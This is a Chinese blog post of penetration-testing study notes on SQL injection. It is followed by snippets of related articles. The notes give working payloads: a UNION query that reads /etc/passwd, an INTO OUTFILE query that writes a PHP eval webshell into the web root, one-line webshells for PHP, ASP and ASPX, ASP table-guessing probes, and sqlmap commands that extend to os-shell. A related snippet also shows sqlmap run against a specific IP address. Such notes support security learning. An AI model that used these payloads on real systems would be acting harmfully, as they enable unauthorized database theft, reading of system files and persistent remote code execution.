sql注入【6】-salmap工具使用

已于 2024-06-14 11:12:04 修改
阅读量466 收藏 5
点赞数 5
文章标签: sql 数据库
于 2024-03-20 17:28:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LfanBQX/article/details/136874455
版权
本文探讨了SQL注入攻击如何利用webshell,包括读取文件、获取数据库表名,以及利用PHP、ASP和Aspx的一句话木马。还介绍了ASP数据库注入的特征和猜测方法,以及使用Pangolin和SQLMap等工具进行渗透测试的技巧。此外,提到了SQL注入可能导致的缓存问题及解决方法。
摘要由CSDN通过智能技术生成




1.sql写入webshell

读取任意文件,取bWAPP库的所有表名
1' union select 1,load_file('/etc/passwd')#
使用mysql outfile 写webshell
关键:(1)数据库开启权限;(2)站点根目录位置<phpinfo或网闸报错会泄露路径>;(3)站点根目录是否有写入权限
1' union select "<?php @eval($_POST['123']);?>",1 into outfile "站点根目录(将\变为\\或/)+写入的php文件名称"
开启权限命令:

一句话木马
php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%>                            <%eval(Request.Item["pass"],"unsafe");%>

2.asp数据库注入

asp报错特点:

asp数据库注入猜库名(全靠硬猜):
and exists(select*from 库名),正确返回正常页面,错误报错
asp猜表名id是否存在
and exists (select id from config)
asp猜标题是否存在
and exists (select title from config)

3.使用工具注入

(1)pangolin穿山甲
(2)sqlmap工具
level   注入级别   level<3  不测head值,渗透测试风险值越低越好
risk  风险级别  update insert
跳过sqlmap的询问使用参数--batch

sqlmap -u +"存在注入点的网址",其中-u只支持get请求,
post请求需要burp抓包后复制请求头,并保存在kali中,使用-r+burp抓包的文件 -p+注入参数(passwd/uname)

级别过低注不出,使用--level 3

查数据

sqlmap进行os-shell交互

phpstorm软件,可将代码进行重新排版(Ctrl+Alt+L)




sql注入一次便存在缓存,删除缓存方法:

复制URL中的sql注入语句去网页测试:

LfanBQX
关注
salmap测试工具
07-13
sqlmap工具,是针对链接地址中存在的漏洞,进行分布式爆破测试,检测出存在的漏洞!进行针对性的修改
SQLMAP
Unitue_逆流
03-14 316
SQL分类:   按照数据类型分:       整型注入、字符型注入   按照注入语法分类:      UNION query SQL injection(可联合查询注入)      Error-based SQL injection(报错性注入)      Boolean-based blind SQL injection(布尔型注入)     Time-based blind S
渗透测试工具sqlmap基础教程
最新发布
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
salmap通关sql-labs学习笔记
qq_43641876的博客
11-19 617
sql注入学习笔记输出1
学习kali下salmap使用-———boole盲注测试
sushing的博客
08-25 695
1.1.查看帮助和参数: 2.先找注入点:点击登录下面的关于平台停机公告的通知滚动栏 3.来到如下页面 4.修改url,设置and 1 = 2 报错找到注入点 5.使用命令 sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 得到数据库为Mysql 6.输入sqlmap -u http://219.153.49.228:48953/new_list.php?id=1 -dbs查看数据库 7.查看数据表:qlmap -u http://2
SQLMap
每天早起吃早餐
03-20 5883
概念 1. 什么是SQL注入?[1] SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,比如将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1263
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
SQL注入的本质
鱼的博客
07-27 1569
SQL注入的本质 注入攻击的本质: 把用户输入的数据当做代码执行。 两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行 针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行 显错注入-联合查询(Mysql数据库)的基本流程 重要知识点: 通过系统自带库查询数据 通过系统自带库查询数据 Mysql在5.0以上版本加入了information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息
salmap1.1.12
03-22
SQL注入漏洞与Salmap1.1.12版本详解》 在网络安全领域,SQL注入是一种常见的攻击手段,它利用了应用程序对用户输入数据的不当处理,使得攻击者能够执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,甚至...
Sqlmap工具
学习、分享、交流
05-29 1388
sqlmap工具:专门用于sql注入漏洞的。
最新的sqlmap-sqlmap
01-18
sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入sqlmap用于自动化的sql注入
SQLMap工具-1】SQLMap简介及简单应用实例
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
渗透常用工具SQLMap使用
qq_33168924的博客
08-28 674
SQLMap使用详解 0x01 SALMap的简单介绍 0x02 SQLMap的安装 0x03 SQLMap使用 A) 常规使用 B)高级参数使用 C)自带绕过模块tamper的使用
eduSRC那些事儿-2(sql注入类+文件上传类)
m0_74360619的博客
02-01 409
并且在桌面找到缴费系统的内网IP,尝试使用Mimikatz获取的密码进行登录,成功登录。文件检测过滤了脚本格式后缀也不存在解析漏洞,而在服务器上传时取的是第一个点的后缀,所以成功上传了php文件。发现成功上传了脚本文件,连接webshell,在利用fofa查找C段资产时,发现目标存在某登录系统,直接使用admin/123456弱口令进后台管理系统,在相关功能点存在文件上传,没有任何过滤,然后上传了一个aspx大马(有通过注册表查看rdp端口的功能),发现管理员把3389端口改成了1111,连接即可登录,
asp aspx 注入练习代码
eldn__的专栏
04-20 1573
ASP:   Dim Db,MyDbPath dim conn '可修改设置一:========================定义数据库类别,1为SQL数据库,0为Access数据库============================= Const IsSqlDataBase =0 MyDbPath = "" '===============
SQLMap 使用参数详解
qq_37019068的博客
10-09 1万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap参数大全
卖瓜小农的博客
02-23 8571
sqlmap参数大全 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data “指定参数” 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehash.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值